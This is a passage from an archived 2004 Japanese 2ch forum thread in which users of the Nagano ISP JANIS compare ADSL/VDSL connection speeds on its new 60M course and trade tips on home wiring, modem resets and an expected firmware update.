最高でも1.6M平均は1M下回ってる。リンクされるかどうかも賭けだったから、速度は諦めていたけど。
素直にリーチにしておけば良かったかな。
いまさらクソ有線には戻りたくないし。





128 :名無しさんに接続中…:04/12/10 21:13:00 ID:yfmblxHm
60M開通。

お客様の収容局 古里有線
ご契約コース 有線ウルトラ60Mコース
接続速度(下り方向) 22140 kbps
接続速度(上り方向) 708 kbps
推定線路長 1048 メートル

上りがもうちょっと欲しかった。
まさか有線でやると思わなかったけど、家の配線考えてみるか。。

129 :名無しさんに接続中…:04/12/11 21:28:34 ID:fyvHJdS6
12Mにすれば2Mくらいになるのでは?


130 :名無しさんに接続中…:04/12/11 21:32:06 ID:fyvHJdS6
>127
12Mにすれば2Mくらいになるのでは?

>129
贅沢な悩みのように思えるのですけど。
下りが20M以上出てるわけですからねえ・・・


131 :127:04/12/12 07:06:36 ID:wn9YYRyf
電話線の長さを最短でノイズに強いってのに交換してみたら

お客様の収容局 NTT****
ご契約コース NTTスタンダード8M
接続速度(下り方向) 4000 kbps
接続速度(上り方向) 736 kbps

まで改善された。ここまで効果あるとは、ADSLってシビアですね。
実際は2割くらい落ちるけどもう文句無しです。
あとはたまに無反応(リンク切れ?)になるのを改善したいな。

>>130
12Mはまだ使えないのです。

132 :名無しさんに接続中…:04/12/12 20:29:17 ID:AaSYKznb
>>127
線路悪すぎ
さすがNTT回線


133 :名無しさんに接続中…:04/12/13 16:09:41 ID:xeg6ct5F
ご契約コース 有線ウルトラ60Mコース
接続速度(下り方向) 7290 kbps
接続速度(上り方向) 810 kbps
推定線路長 2264 メートル

8Mコースと変わってネェェ orz

134 :名無しさんに接続中…:04/12/13 21:20:35 ID:BEtaFUk2
>>133
131番さんみたいに、宅内配線を点検してみたらどうでしょうか。

また、一旦モデムをリセットすると、ノイズなどで速度低下したものが再接続により
その時の回線品質に応じた速度になるようです。
長い間使っていると、徐々にリンク速度が落ちることがあるので、
私は毎朝リセットしてます。

135 :名無しさんに接続中…:04/12/15 00:22:50 ID:bkiEM8Q1
>>133
そりはしょうがないっしょ。
ここに書いてあるぞ
ttp://www.janis.or.jp/adsl/release_ultra60.html
の中間

>今回新たに導入するVDSLモデムはLR(ロングリーチ)VDSLと呼ばれ、
>500mから1.5Km程度の短距離区間ではVDSL本来の高速性を発揮し、
>1.5Kmから2.5Km程度の中距離区間では徐々に使用する周波数帯域を狭くし、
>2.5Km以遠では従来のADSLと同一使用帯域となる、


136 :名無しさんに接続中…:04/12/15 19:40:41 ID:MhB+CtGJ
VDSL、配線いじれば早くならないの?って問い合わせたら、それが限界だよって言われた_| ̄|○
上り810kbpsからせめて1Mbps程度出ればうれしかったのだが。

137 :名無しさんに接続中…:04/12/16 10:38:02 ID:qjM3nNmd
>>136
俺が聞いた限りでは、年内にVDSLモデムのファームアップが予定されているらしい。
なんせ世界で始めての屋外回線でのVDSLサービスだからな。
いろんな環境に合わせたチューニング作業を続けているみたいだった。
技術の進歩は留まることがないから、のんびり待ってみようと思う。


138 :名無しさんに接続中…:04/12/16 21:44:00 ID:fODUR/pK
>>137
チューニング中ですか!
期待してまってたいと思います。

139 :名無しさんに接続中…:04/12/17 03:14:00 ID:beK6Ru6z
(1) 60M/10Mのサービスがはじまる。
(2) 料金保障制度がついている。
(3) グローバルIPアドレスが固定で使える。

JANISのサービスは日本で一番いいかもよ。
なんで長野県だけなのかが不思議なんだけどねえ。


140 :133:04/12/17 05:58:16 ID:yegcb101
ご契約コース 有線ウルトラ60Mコース
接続速度(下り方向) 4860 kbps
接続速度(上り方向) 810 kbps
推定線路長 2218 メートル

なぜか下がってるよオイマジで頼むよ、、、、、

おr2orzor2

141 :名無しさんに接続中…:04/12/17 13:11:58 ID:tQQ7mvWF
>>139
農協だもん、県外は無理

142 :名無しさんに接続中…:04/12/17 13:51:00 ID:LcCOlBIT
>>140

今度のファームアップで、遠距離でも今までと同じ速度程度にはなるらしいが、
2kmを越えている場合、60Mに敢えて乗り換える意味はないな。


143 :名無しさんに接続中…:04/12/18 11:52:34 ID:IFcKWOX/
>>139,141
では、

なぜ長野県電算は頑張っているのか?
なぜ他県のプロバイダはやらないのか?

その辺、わかる人いる?

144 :名無しさんに接続中…:04/12/18 12:24:20 ID:PQuUV+51
グローバルIPが固定っていうのも結構すごいよな。
モデムや基地局設備の絡みで動的変更するのが難しかったのかな?

145 :名無しさんに接続中…:04/12/18 13:55:26 ID:bmK+eWIi
>>144
DHCPサーバー立てるのがめんどくさかったのではと言ってみる

146 :名無しさんに接続中…:04/12/18 21:48:04 ID:InVnSaBx
2chの過去スレのうち、html化されたものを見ようと思ってもうまく繋がらないのは俺だけ?
以前は閲覧できたんだけど、今は繋ごうとしてもはねられる。
JANIS以外の回線にしたら普通に見れたので、JANISの方に原因があるように思えるのだが。

もっとも、html化した過去スレを見ること自体、あまりやらないので影響は少ないけど。


147 :名無しさんに接続中…:04/12/21 15:42:16 ID:6dpvVOtU
NTT回線のウルトラ60Mコース
開通した人 いますか?

37 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)